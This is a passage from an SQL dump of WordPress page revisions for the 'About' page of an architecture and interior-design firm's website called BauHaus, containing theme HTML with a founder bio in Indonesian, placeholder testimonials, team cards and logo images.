rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:57:42','2023-09-22 08:57:42','',38,'https://bauhaus.futuremediatrix.com/?p=4875',0,'revision','',0),(4876,3,'2023-09-22 08:57:42','2023-09-22 08:57:42','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:57:42','2023-09-22 08:57:42','',38,'https://bauhaus.futuremediatrix.com/?p=4876',0,'revision','',0),(4877,3,'2023-09-22 08:58:23','2023-09-22 08:58:23','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:58:23','2023-09-22 08:58:23','',38,'https://bauhaus.futuremediatrix.com/?p=4877',0,'revision','',0);
